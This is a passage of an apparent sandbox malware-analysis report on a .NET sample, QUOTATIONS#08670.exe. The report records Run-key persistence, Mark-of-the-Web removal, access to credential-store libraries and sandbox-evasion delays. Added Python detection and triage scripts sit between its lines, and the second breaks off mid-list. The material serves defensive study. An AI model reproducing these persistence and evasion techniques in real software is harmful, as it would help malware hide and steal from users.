                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: wbemcomn.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: secur32.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: vaultcli.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Section loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                  Source: QUOTATIONS#08670.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: QUOTATIONS#08670.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                  Source: QUOTATIONS#08670.exe | Static file information: File size 1330176 > 1048576
                  Source: QUOTATIONS#08670.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x133a00
                  Source: QUOTATIONS#08670.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: Yara match | File source: 0.2.QUOTATIONS#08670.exe.3abdaa0.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.QUOTATIONS#08670.exe.4e50000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.QUOTATIONS#08670.exe.4e50000.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.QUOTATIONS#08670.exe.3abdaa0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000009.00000002.2575069317.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000002.2575551377.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2008575393.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 0_2_008FC9A4 push ebp; ret 0_2_008FC9A5
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 0_2_008FC9F0 push ebp; ret 0_2_008FC9F1
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 0_2_0712BB1B push ecx; retf EFCDh 0_2_0712BC92
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 0_2_071EC1B7 push eax; iretd 0_2_071EC1C6
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 0_2_071EA014 pushad ; retf 0_2_071EA06D
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 0_2_071E7E59 push ecx; retf 0046h 0_2_071E7E7A
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Code function: 4_2_01460C55 push edi; retf 4_2_01460C7A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_02F6C9F0 push ebp; ret 8_2_02F6C9F1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_02F6C9A4 push ebp; ret 8_2_02F6C9A5
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_06223370 push eax; iretd 8_2_06223371
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_06222F71 push esp; retf 8_2_06222F72
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_077D2379 push cs; ret 8_2_077D238F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_077DBB27 push ecx; retf EFCDh 8_2_077DBC92
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_0789C1B7 push eax; iretd 8_2_0789C1C6
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_0789A014 pushad ; retf 8_2_0789A06D
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07897E59 push ecx; retf 0046h 8_2_07897E7A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB05A1 push es; retf 0007h 8_2_07CB05A2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB0541 push es; retf 0007h 8_2_07CB0542
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB94D1 push esp; retf 0007h 8_2_07CB94D2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB94F1 push esp; retf 0007h 8_2_07CB94F2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB9389 push esp; retf 0007h 8_2_07CB938A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB22D1 push cs; retf 0007h 8_2_07CB22D2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB22AE push cs; retf 0007h 8_2_07CB22B2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8F17 push ebx; retf 0007h 8_2_07CB8F1A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8EE9 push ebx; retf 0007h 8_2_07CB8EEA
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8EA9 push ebx; retf 0007h 8_2_07CB8EAA
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8E30 push ebx; retf 0007h 8_2_07CB8E32
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CBFDB2 push FFFFFF8Bh; iretd 8_2_07CBFDB7
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8C69 push edx; retf 0007h 8_2_07CB8C6A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8B77 push ecx; retf 0007h 8_2_07CB8B7A
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Code function: 8_2_07CB8AC9 push ecx; retf 0007h 8_2_07CB8ACA
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File created: C:\Users\user\AppData\Roaming\newapp\newapp.exe
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newapp

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File opened: C:\Users\user\Desktop\QUOTATIONS#08670.exe\:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | File opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | File opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe\:Zone.Identifier read attributes | delete
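Detection logic for three of the behaviours recorded above, written as an added example (it is not part of the Joe Sandbox report and not code from the sample): a process launching a second copy of its own image with no arguments (the process-creation entries for QUOTATIONS#08670.exe and newapp.exe), a Run-key value whose data points into a user-writable directory (the HKCU\...\CurrentVersion\Run "newapp" entry), and an open of a Zone.Identifier stream with delete access (the Mark-of-the-Web entries directly above). The Event schema, its field names and the sample events are constructed for the example and do not match Sysmon's or any EDR's exact format; the chrome.exe, svchost.exe and tray.exe entries are invented benign contrast cases.

```python
# Added example (not part of the Joe Sandbox report): detection logic for three
# behaviours recorded in the report, run over constructed endpoint events.
# The Event schema and the sample events are invented for this example; the
# field names do not match Sysmon or any particular EDR product.
from dataclasses import dataclass
from typing import Dict, List, Optional

RUN_KEYS = (
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
)
# Directories a standard user can write to: autostart entries pointing here
# deserve far more scrutiny than entries under Program Files.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\", "\\temp\\")
# Directories where same-image child processes are routine (browser sandboxes etc.).
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


@dataclass
class Event:
    kind: str            # "process", "registry" or "file"
    image: str           # image path of the acting process
    pid: int
    target: str = ""     # child image, registry key, or file path
    cmdline: str = ""    # child command line (process events)
    value: str = ""      # registry value name (registry events)
    data: str = ""       # registry value data (registry events)
    access: str = ""     # requested access (file events)


def _norm(s: str) -> str:
    """Lower-case and strip surrounding quotes so paths compare reliably."""
    return s.strip().strip('"').lower()


def detect_self_spawn(events: List[Event]) -> List[str]:
    """Flag a process that starts a second copy of its own image with no
    arguments from outside Program Files / Windows. That is what the report
    shows for QUOTATIONS#08670.exe and newapp.exe; the usual reason is a loader
    starting a suspended child of itself and writing a decrypted payload into
    it. Browsers also spawn their own image, but from a trusted directory and
    with a long argument list, so those are filtered out."""
    hits = []
    for e in events:
        if e.kind != "process":
            continue
        parent, child = _norm(e.image), _norm(e.target)
        if parent != child or child.startswith(TRUSTED_DIRS):
            continue
        args = _norm(e.cmdline).replace(child, "", 1).strip()
        if not args:
            hits.append(f"self-spawn: {e.image} (pid {e.pid}) -> {e.target}")
    return hits


def detect_run_key_persistence(events: List[Event]) -> List[str]:
    """Flag a Run / RunOnce value whose data points into a user-writable directory."""
    hits = []
    for e in events:
        if e.kind != "registry" or not _norm(e.target).startswith(RUN_KEYS):
            continue
        if any(d in _norm(e.data) for d in USER_WRITABLE):
            hits.append(f"run-key persistence: {e.target}\\{e.value} = {e.data}")
    return hits


def detect_motw_removal(events: List[Event]) -> List[str]:
    """Flag an open of a Zone.Identifier stream with DELETE access: removing the
    Mark-of-the-Web so the dropped file no longer looks downloaded."""
    hits = []
    for e in events:
        if e.kind != "file":
            continue
        if _norm(e.target).endswith(":zone.identifier") and "delete" in _norm(e.access):
            hits.append(f"motw removal: {e.image} (pid {e.pid}) deleted {e.target}")
    return hits


# Constructed sample telemetry modelled on the report's entries plus benign contrast cases.
SAMPLE_EVENTS = [
    Event("process", r"C:\Users\user\Desktop\QUOTATIONS#08670.exe", 7592,
          target=r"C:\Users\user\Desktop\QUOTATIONS#08670.exe",
          cmdline=r'"C:\Users\user\Desktop\QUOTATIONS#08670.exe"'),
    Event("process", r"C:\Program Files\Google\Chrome\Application\chrome.exe", 4100,
          target=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          cmdline=r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer'),
    Event("registry", r"C:\Users\user\Desktop\QUOTATIONS#08670.exe", 7592,
          target=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
          value="newapp", data=r"C:\Users\user\AppData\Roaming\newapp\newapp.exe"),
    Event("registry", r"C:\Windows\System32\svchost.exe", 900,
          target=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
          value="VendorTray", data=r"C:\Program Files\Vendor\tray.exe"),
    Event("file", r"C:\Users\user\Desktop\QUOTATIONS#08670.exe", 7592,
          target=r"C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier",
          access="read attributes | delete"),
    Event("file", r"C:\Users\user\Desktop\QUOTATIONS#08670.exe", 7592,
          target=r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
          access="read"),
]


def run_all(events: Optional[List[Event]] = None) -> Dict[str, List[str]]:
    events = SAMPLE_EVENTS if events is None else events
    return {
        "self_spawn": detect_self_spawn(events),
        "run_key": detect_run_key_persistence(events),
        "motw": detect_motw_removal(events),
    }


if __name__ == "__main__":
    for name, hits in run_all().items():
        print(f"{name}: {len(hits)} hit(s)")
        for h in hits:
            print("  " + h)
```

Each rule corresponds to telemetry that is normally available: process creation with parent image and command line (Sysmon event 1), registry value set (Sysmon event 13), and file deletion or stream access (Sysmon events 23/26, or an EDR file-open event carrying the requested access mask). The self-spawn rule is the noisiest of the three; the trusted-directory and empty-argument filters are the minimum tuning needed before it is run fleet-wide.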
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Process information set: NOOPENFILEERRORBOX (first of 86 identical entries in the report)
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Process information set: NOOPENFILEERRORBOX (94 occurrences)

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Memory allocated (memory reserve | memory write watch) at: 8F0000, 2690000, 4690000, 7BC0000, 8BC0000, 8D90000, 9D90000, A120000, B120000, C120000, 1460000, 3060000, 5060000
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Memory allocated (memory reserve | memory write watch) at: 16D0000, 30E0000, 2EC0000, 8120000, 9120000, 92E0000, A2E0000, A650000, B650000, C650000, 1080000, 2A60000, 28A0000, 7AC0000, 8AC0000, 8C80000, 9C80000, 9FF0000, AFF0000, BFF0000
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Thread delayed: delay time: 922337203685477 (2 occurrences), 600000, 599874, 599763, 599656, 599547, 599437, 599328, 599219, 599109, 599000, 598891, 598766, 598641, 598519, 598318, 598188, 598063, 597938, 597828, 597719, 597594, 597484, 597375, 597263, 597156, 597047, 596938, 596813, 596700, 596594, 596469, 596359, 596250, 596140, 596031, 595922, 595811, 595662, 595428, 595297, 595187, 595078, 594969, 594844, 594734, 594625, 594516, 594406, 594297, 594187
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Window / User API: threadDelayed 2166, 7687, 2951, 6895
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Window / User API: threadDelayed 4160, 5683, 4145, 5711
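The entries above (the WMI adapter query, the write-watch reservations, the two 922337203685477 ms delays, the descending 600000 to 594187 ms series and the threadDelayed counters) are what an analyst reads off this section. The helper below is an added example, not part of the Joe Sandbox report or its output format: it parses behaviour lines constructed in the same "Source: ... | event" shape as the entries above and reduces them to evasion indicators. Two points it encodes: 922337203685477 is Int64.MaxValue / 10000, i.e. TimeSpan.MaxValue in whole milliseconds, so those delays are waits that never return on their own; and a strictly decreasing delay series with near-constant steps is consistent with a deadline loop that re-sleeps the remaining time whenever the sandbox shortens a sleep. WRITE_WATCH_MIN, the countdown tolerance and the VM_FINGERPRINT_WMI set are the editor's assumptions. Caveat worth keeping in mind: the CLR garbage collector is known to reserve heap segments with write watch, so for a .NET sample like this one the write-watch finding on its own is weak evidence of evasion.

```python
"""Triage helper for Joe Sandbox "Malware Analysis System Evasion" behaviour lines.

Added example: the parser, the thresholds and SAMPLE_LINES are the editor's
constructions modelled on the report entries, not Joe Sandbox code or output.
"""
import re
from collections import Counter

# .NET ticks are 100 ns, so Int64.MaxValue // 10_000 is TimeSpan.MaxValue in whole
# milliseconds. A delay of exactly this value is a wait that never returns.
NET_MAX_DELAY_MS = (2**63 - 1) // 10_000      # 922337203685477

# Assumption: this many write-watch reservations is worth reporting at all.
WRITE_WATCH_MIN = 3

# Assumption: enumerating adapters exposes MAC OUIs (VMware, VirtualBox, Hyper-V).
VM_FINGERPRINT_WMI = {"Win32_NetworkAdapter", "Win32_NetworkAdapterConfiguration"}

LINE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)(?:\s+TID:\s*(?P<tid>\d+))?\s*\|\s*(?P<event>.+)$")
DELAY = re.compile(r"Thread delayed: delay time: (\d+)")
WRITE_WATCH = re.compile(r"Memory allocated: [0-9A-Fa-f]+ memory reserve \| memory write watch")
WMI = re.compile(r"WMI Queries: .*?(Win32_\w+)")
SLEEP_COUNT = re.compile(r"threadDelayed (\d+)")
SLEEP_TIME = re.compile(r"Thread sleep time: -(\d+)s >= -(\d+)s")   # value vs. sandbox threshold

# Constructed input mirroring the report's entries (same "Source: ... | event" shape).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Memory allocated: 8F0000 memory reserve | memory write watch",
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Memory allocated: 2690000 memory reserve | memory write watch",
    r"Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Memory allocated: 16D0000 memory reserve | memory write watch",
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe | Thread delayed: delay time: 922337203685477",
] + [
    r"Source: C:\Users\user\Desktop\QUOTATIONS#08670.exe | Thread delayed: delay time: %d" % ms
    for ms in (600000, 599874, 599763, 599656, 599547, 599437)
] + [
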